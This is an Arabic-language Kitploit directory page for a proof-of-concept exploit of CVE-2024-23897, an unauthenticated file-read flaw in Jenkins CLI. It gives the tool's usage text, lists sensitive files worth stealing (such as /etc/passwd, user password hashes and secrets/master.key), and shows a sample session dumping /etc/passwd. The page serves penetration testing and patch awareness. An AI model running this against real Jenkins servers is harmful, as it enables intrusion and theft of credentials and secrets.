Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-23897 — استغلال إثبات المفهوم لـ CVE-2024-23897 يتيح قراءة ملفات تعسفية غير مصادق عليها على خوادم Jenkins. يدعم الجلسات المصادق عليها والوكيل وحفظ الملفات. | Kitploit
أدوات/GitHubGitHub/godylockz/cve-2024-23897
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubgodylockz/cve-2024-23897

CVE-2024-23897

استغلال إثبات المفهوم لـ CVE-2024-23897 يتيح قراءة ملفات تعسفية غير مصادق عليها على خوادم Jenkins. يدعم الجلسات المصادق عليها والوكيل وحفظ الملفات.

عرض المستودع
4351منذ 9 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تعديلات Anant


  • تم إصلاح مشكلة قراءة الملفات مثل /etc/os-release حيث كانت تقوم بتجريد المحتوى.
  • تمت إضافة دعم للجلسة الموثقة: تقديم اسم المستخدم وكلمة المرور كوسيطات سطر الأوامر.

root@kitploit:~
usage: jenkins_fileread.py [-h] -u URL [-a USERAGENT] [-f FILE] [-t TIMEOUT] [-s] [-o] [-p PROXY] [-v] [--username USERNAME] [--password PASSWORD]

POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Jenkins URL
  -a, --useragent USERAGENT
                        User agent to use when sending requests
  -f, --file FILE       File path to read
  -t, --timeout TIMEOUT
                        Request timeout
  -s, --save            Save file contents
  -o, --overwrite       Overwrite existing files
  -p, --proxy PROXY     HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag
  --username USERNAME   Jenkins username for authentication
  --password PASSWORD   Jenkins password or API token for authentication

وصف القراءة الأصلي أدناه

CVE-2024-23897: قراءة ملف تعسفي في Jenkins

الوصف

يمكن استخدام هذا الدليل البرهاني (PoC) لاستغلال ثغرة CVE-2024-23897 للحصول على وصول قراءة الملفات على خادم Jenkins <= الإصدار 2.441.

لا تقوم Jenkins 2.441 والإصدارات الأقدم، LTS 2.426.2 والإصدارات الأقدم بتعطيل ميزة في محلل أوامر CLI الخاص بها والتي تستبدل رمز @ متبوعًا بمسار ملف في وسيطة محتوى الملف، مما يسمح للمهاجمين غير الموثوقين بقراءة ملفات عشوائية على نظام ملفات وحدة التحكم Jenkins.

الشدة: 7.5 عالية المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

هناك قيود شديدة على هذه الثغرة، حيث لا يمكن قراءة الملفات الثنائية بالكامل. بعض الملفات النصية غير الثنائية التي قد تكون ذات أهمية:

  • /proc/self/environ متغيرات البيئة بما في ذلك JENKINS_HOME
  • /proc/self/cmdline وسيطات سطر الأوامر
  • /etc/hosts تحليل أسماء النطاقات المحلية في Linux
  • /etc/passwd حسابات مستخدمي Linux
  • /var/jenkins_home/users/users.xml مواقع تخزين حسابات المستخدمين
  • /var/jenkins_home/users/<user_directory>/config.xml تجزئة كلمة مرور المستخدم (BCrypt)
  • /var/jenkins_home/secrets/master.key مفتاح التشفير السري

الاستخدام

root@kitploit:~
usage: jenkins_fileread.py [-h] -u URL [-f FILE] [-t TIMEOUT] [-s] [-o] [-p PROXY] [-v]

POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Jenkins URL
  -f FILE, --file FILE  File path to read
  -t TIMEOUT, --timeout TIMEOUT
                        Request timeout
  -s, --save            Save file contents
  -o, --overwrite       Overwrite existing files
  -p PROXY, --proxy PROXY
                        HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag

مثال

root@kitploit:~
$ jenkins_fileread.py -u http://<target-ip>:8080
Welcome to the Jenkins file-read shell. Type help or ? to list commands.

file> /etc/passwd
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

المراجع

  • NIST CVE-2024-23897
  • إشعار أمان Jenkins 2024-01-24
  • التوسع المفرط: كشف الثغرات الأمنية الحرجة في Jenkins
  • تحليل CVE-2024-23897: ظهور رمز PoC بعد إشعار Jenkins مباشرة
تنزيل الأداة